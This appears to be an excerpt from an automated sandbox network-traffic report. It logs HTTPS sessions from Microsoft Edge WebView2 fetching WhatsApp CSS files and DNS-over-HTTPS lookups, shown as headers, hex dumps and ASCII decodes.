                                                                                                                                                                                                                2024-03-10 16:46:08 UTC1500INData Raw: 74 3a 31 36 70 78 7d 68 74 6d 6c 5b 64 69 72 3d 72 74 6c 5d 20 2e 5f 33 70 32 5a 68 7b 6c 65 66 74 3a 31 36 70 78 7d 68 74 6d 6c 5b 64 69 72 5d 20 2e 5f 32 55 4e 51 6f 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 38 70 78 7d 0a 2e 5f 33 30 73 63 5a 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 66 6c 65 78 3b 6f 76 65 72 66 6c 6f 77 3a 69 6e 68 65 72 69 74 3b 74 65 78 74 2d 6f 76 65 72 66 6c 6f 77 3a 69 6e 68 65 72 69 74 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 69 6e 68 65 72 69 74 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 7d 2e 4d 6b 30 42 70 2c 2e 5f 33 30 73 63 5a 7b 66 6c 65 78 2d 67 72 6f 77 3a 30 7d 2e 4f 72 4a 5f 72 7b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 74 65 61 6c 29 7d 2e 54 78 41 62 54 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66
                                                                                                                                                                                                                Data Ascii: t:16px}html[dir=rtl] ._3p2Zh{left:16px}html[dir] ._2UNQo{border-radius:8px}._30scZ{display:inline-flex;overflow:inherit;text-overflow:inherit;white-space:inherit;align-items:center}.Mk0Bp,._30scZ{flex-grow:0}.OrJ_r{color:var(--teal)}.TxAbT{display:flex;f
                                                                                                                                                                                                                2024-03-10 16:46:08 UTC1500INData Raw: 72 5d 20 2e 5f 31 33 44 65 70 3a 61 66 74 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 70 70 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 74 72 69 70 65 29 7d 68 74 6d 6c 5b 64 69 72 3d 6c 74 72 5d 20 2e 5f 31 33 44 65 70 3a 61 66 74 65 72 7b 6c 65 66 74 3a 30 7d 68 74 6d 6c 5b 64 69 72 3d 72 74 6c 5d 20 2e 5f 31 33 44 65 70 3a 61 66 74 65 72 7b 72 69 67 68 74 3a 30 7d 2e 74 73 42 67 53 2e 5f 31 46 6d 34 6d 3a 61 66 74 65 72 2c 2e 64 61 72 6b 20 2e 5f 31 33 44 65 70 3a 61 66 74 65 72 2c 2e 6e 61 74 69 76 65 20 2e 5f 31 46 6d 34 6d 3a 61 66 74 65 72 7b 63 6f 6e 74 65 6e 74 3a 6e 6f 6e 65 7d 7d 2e 5f 33 75 71 35 6b 7b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 74 6f 70 3a 30 3b 7a 2d 69 6e 64 65 78 3a 76 61 72 28 2d 2d 6c 61
                                                                                                                                                                                                                Data Ascii: r] ._13Dep:after{background-color:var(--app-background-stripe)}html[dir=ltr] ._13Dep:after{left:0}html[dir=rtl] ._13Dep:after{right:0}.tsBgS._1Fm4m:after,.dark ._13Dep:after,.native ._1Fm4m:after{content:none}}._3uq5k{position:fixed;top:0;z-index:var(--la
                                                                                                                                                                                                                2024-03-10 16:46:08 UTC1500INData Raw: 6c 61 70 73 65 7d 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 53 65 67 6f 65 20 55 49 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 48 65 6c 76 65 74 69 63 61 2c 4c 75 63 69 64 61 20 47 72 61 6e 64 65 2c 41 72 69 61 6c 2c 55 62 75 6e 74 75 2c 43 61 6e 74 61 72 65 6c 6c 2c 46 69 72 61 20 53 61 6e 73 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 70 72 69 6d 61 72 79 29 3b 2d 77 65 62 6b 69 74 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 6e 6f 6e 65 3b 2d 6d 6f 7a 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 6e 6f 6e 65 3b 75 73 65 72 2d 73 65 6c 65 63 74 3a 6e 6f 6e 65 3b 74 65 78 74 2d 72 65 6e 64 65 72 69 6e 67 3a 6f 70 74 69 6d 69 7a 65 4c 65 67 69 62 69 6c 69 74 79 3b 66 6f 6e 74 2d 66 65 61 74 75 72 65 2d 73 65 74 74 69 6e 67 73
                                                                                                                                                                                                                Data Ascii: lapse}body{font-family:Segoe UI,Helvetica Neue,Helvetica,Lucida Grande,Arial,Ubuntu,Cantarell,Fira Sans,sans-serif;color:var(--primary);-webkit-user-select:none;-moz-user-select:none;user-select:none;text-rendering:optimizeLegibility;font-feature-settings
                                                                                                                                                                                                                2024-03-10 16:46:08 UTC1500INData Raw: 3a 30 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 62 6f 72 64 65 72 3a 30 7d 70 72 65 7b 77 68 69 74 65 2d 73 70 61 63 65 3a 70 72 65 2d 77 72 61 70 7d 6f 6c 2c 75 6c 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 61 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 2e 64 61 72 6b 20 2a 7b 73 63 72 6f 6c 6c 62 61 72 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 76 61 72 28 2d 2d 77 68 69 74 65 2d 72 67 62 29 2c 2e 31 36 29 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 6c 69 67 68 74 20 2a 2c 2a 7b 73 63 72 6f 6c 6c 62 61 72 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 76 61 72 28 2d 2d 62 6c 61 63 6b 2d 72 67 62 29 2c 2e 32 29 20 72 67 62 61 28 76 61 72 28 2d 2d 77 68 69 74 65 2d 72 67 62 29 2c 2e
                                                                                                                                                                                                                Data Ascii: :0;cursor:pointer;background:none;border:0}pre{white-space:pre-wrap}ol,ul{padding:0;margin:0}a{text-decoration:none}.dark *{scrollbar-color:rgba(var(--white-rgb),.16) transparent}.light *,*{scrollbar-color:rgba(var(--black-rgb),.2) rgba(var(--white-rgb),.
                                                                                                                                                                                                                2024-03-10 16:46:08 UTC905INData Raw: 46 6e 52 74 77 75 4f 4f 37 51 4b 61 79 45 75 49 50 48 35 78 4c 69 68 73 71 4e 32 33 38 5a 43 49 6e 62 56 6d 37 63 71 6e 4c 6a 6a 68 33 47 58 58 7a 63 73 63 4f 34 53 34 38 37 2f 4e 73 6b 49 47 36 6f 33 4c 6a 6a 5a 2b 63 57 48 72 63 4c 6a 70 73 34 32 72 2f 6f 75 4f 39 33 77 58 47 66 4b 7a 69 75 78 49 6b 54 4a 30 36 63 4f 48 48 69 78 49 6b 54 4a 30 36 63 4f 48 48 69 78 49 6b 54 4a 30 36 63 4f 48 48 69 78 49 6b 54 4a 30 36 63 4f 48 48 69 78 49 6b 54 39 78 2f 48 52 52 2b 50 69 6a 37 59 46 6e 30 6b 4d 66 73 77 61 66 59 78 34 4f 67 44 33 4e 6c 48 37 36 4d 66 6d 73 68 2b 33 43 58 36 51 61 58 73 52 38 79 79 48 77 36 4d 66 71 77 7a 2b 34 48 63 36 45 65 70 73 78 2b 43 7a 78 35 66 45 44 31 34 49 6e 74 6b 53 50 53 77 6c 2b 77 78 50 64 45 44 6c 72 4a 48 59 32 55 50 4e
                                                                                                                                                                                                                Data Ascii: FnRtwuOO7QKayEuIPH5xLihsqN238ZCInbVm7cqnLjjh3GXXzcscO4S487/NskIG6o3LjjZ+cWHrcLjps42r/ouO93wXGfKziuxIkTJ06cOHHixIkTJ06cOHHixIkTJ06cOHHixIkTJ06cOHHixIkT9x/HRR+Pij7YFn0kMfswafYx4OgD3NlH76Mfmsh+3CX6QaXsR8yyHw6Mfqwz+4Hc6Eepsx+Czx5fED14IntkSPSwl+wxPdEDlrJHY2UPN
                                                                                                                                                                                                                2024-03-10 16:46:08 UTC1500INData Raw: 4b 6a 6e 63 61 44 4b 68 4b 64 32 7a 59 43 6c 4b 56 66 67 5a 37 6f 41 48 2b 45 4a 33 47 76 46 4f 52 6b 41 41 41 41 41 53 55 56 4f 52 4b 35 43 59 49 49 3d 29 7d 68 74 6d 6c 5b 64 69 72 5d 20 2e 61 74 74 61 63 68 2d 6d 65 64 69 61 2d 61 75 64 69 6f 2d 74 68 75 6d 62 2c 68 74 6d 6c 5b 64 69 72 5d 20 2e 6d 65 64 69 61 2d 67 61 6c 6c 65 72 79 20 2e 69 6d 61 67 65 2d 61 75 64 69 6f 2c 68 74 6d 6c 5b 64 69 72 5d 20 2e 6d 65 64 69 61 2d 76 69 65 77 65 72 20 2e 69 6d 61 67 65 2d 61 75 64 69 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 62 67 41 41 41 47 34 42 41 4d 41 41 41 44 46 35 4f 2b 41 41 41 41 41
                                                                                                                                                                                                                Data Ascii: KjncaDKhKd2zYClKVfgZ7oAH+EJ3GvFORkAAAAASUVORK5CYII=)}html[dir] .attach-media-audio-thumb,html[dir] .media-gallery .image-audio,html[dir] .media-viewer .image-audio{background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAbgAAAG4BAMAAADF5O+AAAAA


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                3192.168.2.449753172.64.41.34433352C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2024-03-10 16:46:08 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                Content-Length: 128
                                                                                                                                                                                                                Accept: application/dns-message
                                                                                                                                                                                                                Accept-Language: *
                                                                                                                                                                                                                User-Agent: Chrome
                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                Content-Type: application/dns-message
                                                                                                                                                                                                                2024-03-10 16:46:08 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                2024-03-10 16:46:09 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                Date: Sun, 10 Mar 2024 16:46:09 GMT
                                                                                                                                                                                                                Content-Type: application/dns-message
                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                Content-Length: 468
                                                                                                                                                                                                                CF-RAY: 8624c77aff4709f7-LAS
                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                2024-03-10 16:46:09 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 f4 00 04 8e fb 02 5e 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                Data Ascii: wwwgstaticcom^)


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                4192.168.2.449754172.64.41.34433352C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2024-03-10 16:46:09 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                Content-Length: 128
                                                                                                                                                                                                                Accept: application/dns-message
                                                                                                                                                                                                                Accept-Language: *
                                                                                                                                                                                                                User-Agent: Chrome
                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                Content-Type: application/dns-message
                                                                                                                                                                                                                2024-03-10 16:46:09 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                2024-03-10 16:46:10 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                Date: Sun, 10 Mar 2024 16:46:09 GMT
                                                                                                                                                                                                                Content-Type: application/dns-message
                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                Content-Length: 468
                                                                                                                                                                                                                CF-RAY: 8624c77f7e0069e3-LAS
                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                2024-03-10 16:46:10 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 cf 00 04 8e fb 02 5e 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                Data Ascii: wwwgstaticcom^)


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                5192.168.2.44975631.13.65.494433352C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2024-03-10 16:46:09 UTC657OUTGET /rsrc.php/v3/yI/l/0,cross/C2fHuK6eV5E.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                                                                                                                                                                                Host: static.whatsapp.net
                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117", "Microsoft Edge WebView2";v="117"
                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                Sec-Fetch-Dest: style
                                                                                                                                                                                                                Referer: https://www.whatsapp.com/
                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                2024-03-10 16:46:09 UTC1706INHTTP/1.1 200 OK
                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                Content-Type: text/css; charset=utf-8
                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                Expires: Thu, 27 Feb 2025 13:44:45 GMT
                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                permissions-policy-report-only: clipboard-read=(), clipboard-write=();report-to="permissions_policy"
                                                                                                                                                                                                                permissions-policy: accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), clipboard-write=(self), display-capture=(self), encrypted-media=(self), fullscreen=(self), gamepad=*, geolocation=(self), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(self), publickey-credentials-get=(self), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=(self);report-to="permissions_policy"
                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                origin-agent-cluster: ?0
                                                                                                                                                                                                                content-md5: /yjTedR4bvWD4O6B5GL9ew==
                                                                                                                                                                                                                X-FB-Debug: cQXeTUoXyAoDHjMJaVN94xeP1V1Pc7GYpsSOsK1rXPWZVEnmFMTyMfO9KMJ5ePVJE4IbalQqfp7dHtiw5CZqYg==
                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                Date: Sun, 10 Mar 2024 16:46:09 GMT
                                                                                                                                                                                                                X-FB-Connection-Quality: MODERATE; q=0.3, rtt=204, rtx=0, c=14, mss=1274, tbw=3337, tp=-1, tpl=-1, uplat=0, ullat=-1
                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                2024-03-10 16:46:09 UTC1500INData Raw: 31 61 31 62 0d 0a 2e 72 69 63 68 2d 74 65 78 74 20 61 2e 66 72 61 67 6d 65 6e 74 7b 62 6f 72 64 65 72 3a 30 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 3b 68 65 69 67 68 74 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 30 3b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 3b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 6e 6f 6e 65 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 31 30 39 36 70 78 29 7b 2e 72 69 63 68 2d 74 65 78 74 20 61 2e 66 72 61 67 6d 65 6e 74 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 32 31 70 78 3b 6d 61 72 67 69 6e 2d 74
                                                                                                                                                                                                                Data Ascii: 1a1b.rich-text a.fragment{border:0;box-sizing:border-box;display:block;font-size:0;height:0;line-height:0;outline:none;pointer-events:none;position:relative;text-decoration:none}@media (min-width: 1096px){.rich-text a.fragment{padding-top:121px;margin-t
                                                                                                                                                                                                                2024-03-10 16:46:09 UTC1500INData Raw: 61 6c 2d 61 6c 69 67 6e 3a 74 6f 70 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 39 70 78 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 31 70 78 7d 2e 72 69 63 68 2d 74 65 78 74 20 74 64 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 65 35 65 35 65 35 7d 2e 72 69 63 68 2d 74 65 78 74 20 74 68 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 63 6f 6c 6f 72 3a 23 62 30 62 30 62 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 33 70 78 20 73 6f 6c 69 64 20 23 65 35 65
                                                                                                                                                                                                                Data Ascii: al-align:top;padding-top:9px;padding-bottom:10px;padding-right:20px;padding-left:12px;font-size:14px;line-height:21px}.rich-text td{border-bottom:1px solid #e5e5e5}.rich-text th{text-align:left;font-weight:normal;color:#b0b0b0;border-bottom:3px solid #e5e
                                                                                                                                                                                                                2024-03-10 16:46:09 UTC1500INData Raw: 64 65 6e 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 37 36 38 70 78 29 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 31 30 39 35 70 78 29 7b 2e 72 69 63 68 2d 74 65 78 74 20 68 33 20 61 7b 68 65 69 67 68 74 3a 38 31 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 38 31 70 78 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 31 30 39 36 70 78 29 7b 2e 72 69 63 68 2d 74 65 78 74 20 68 33 20 61 7b 68 65 69 67 68 74 3a 31 30 38 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 38 70 78 7d 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 36 37 70 78 29 7b 2e 72 69 63 68 2d 74 65 78 74 20 68 33 20 61 7b 68 65 69 67 68 74 3a 37 34 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 37 34 70 78 7d 7d 2e 72 69 63 68 2d 74 65
                                                                                                                                                                                                                Data Ascii: den}@media (min-width: 768px) and (max-width: 1095px){.rich-text h3 a{height:81px;margin-top:-81px}}@media (min-width: 1096px){.rich-text h3 a{height:108px;margin-top:-108px}}@media (max-width: 767px){.rich-text h3 a{height:74px;margin-top:-74px}}.rich-te
                                                                                                                                                                                                                2024-03-10 16:46:09 UTC1500INData Raw: 23 6e 6f 6b 69 61 5f 73 65 61 72 63 68 20 2e 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 7d 2e 72 69 63 68 2d 74 65 78 74 20 6c 69 20 70 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 72 69 63 68 2d 74 65 78 74 20 2e 69 63 6f 6e 2d 6c 61 72 67 65 7b 6d 61 78 2d 77 69 64 74 68 3a 33 34 70 78 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 78 2d 68 65 69 67 68 74 3a 33 34 70 78 21 69 6d 70 6f 72 74 61 6e 74 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 32 70 78 7d 2e 72 69 63 68 2d 74 65 78 74 20 2e 69 63 6f 6e 7b 6d 61 78 2d 77 69 64 74 68 3a 32 35 70 78 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 78 2d 68 65 69 67 68 74 3a 32 35 70 78 21 69 6d 70 6f 72 74 61 6e
                                                                                                                                                                                                                Data Ascii: #nokia_search .title{font-size:100%}.rich-text li p{display:block;width:100%}.rich-text .icon-large{max-width:34px!important;max-height:34px!important;vertical-align:middle;margin-left:2px}.rich-text .icon{max-width:25px!important;max-height:25px!importan
                                                                                                                                                                                                                2024-03-10 16:46:09 UTC696INData Raw: 68 69 72 64 3a 66 69 72 73 74 2d 63 68 69 6c 64 2c 2e 72 69 63 68 2d 74 65 78 74 20 69 6d 67 2e 68 61 6c 66 3a 66 69 72 73 74 2d 63 68 69 6c 64 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 7d 2e 72 69 63 68 2d 74 65 78 74 20 69 6d 67 2e 68 61 6c 66 3a 6c 61 73 74 2d 6f 66 2d 74 79 70 65 2c 2e 72 69 63 68 2d 74 65 78 74 20 69 6d 67 2e 74 68 69 72 64 3a 6c 61 73 74 2d 6f 66 2d 74 79 70 65 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 7d 2e 72 69 63 68 2d 74 65 78 74 20 69 6d 67 2e 68 61 6c 66 3a 6c 61 73 74 2d 6f 66 2d 74 79 70 65 3a 61 66 74 65 72 2c 2e 72 69 63 68 2d 74 65 78 74 20 69 6d 67 2e 74 68 69 72 64 3a 6c 61 73 74 2d 6f 66 2d 74 79 70 65 3a 61 66 74 65 72 7b 63 6f 6e 74 65 6e 74 3a 27 2e 27 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 30 3b
                                                                                                                                                                                                                Data Ascii: hird:first-child,.rich-text img.half:first-child{margin-left:0}.rich-text img.half:last-of-type,.rich-text img.third:last-of-type{float:none}.rich-text img.half:last-of-type:after,.rich-text img.third:last-of-type:after{content:'.';display:block;height:0;


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                6192.168.2.44975731.13.65.494433352C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2024-03-10 16:46:09 UTC657OUTGET /rsrc.php/v3/yb/l/0,cross/0n-rMIA_g6I.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                                                                                                                                                                                Host: static.whatsapp.net
                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117", "Microsoft Edge WebView2";v="117"
                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                Sec-Fetch-Dest: style
                                                                                                                                                                                                                Referer: https://www.whatsapp.com/
                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                2024-03-10 16:46:09 UTC1705INHTTP/1.1 200 OK
                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                Content-Type: text/css; charset=utf-8
                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                Expires: Wed, 05 Mar 2025 04:24:45 GMT
                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                document-policy: force-load-at-top
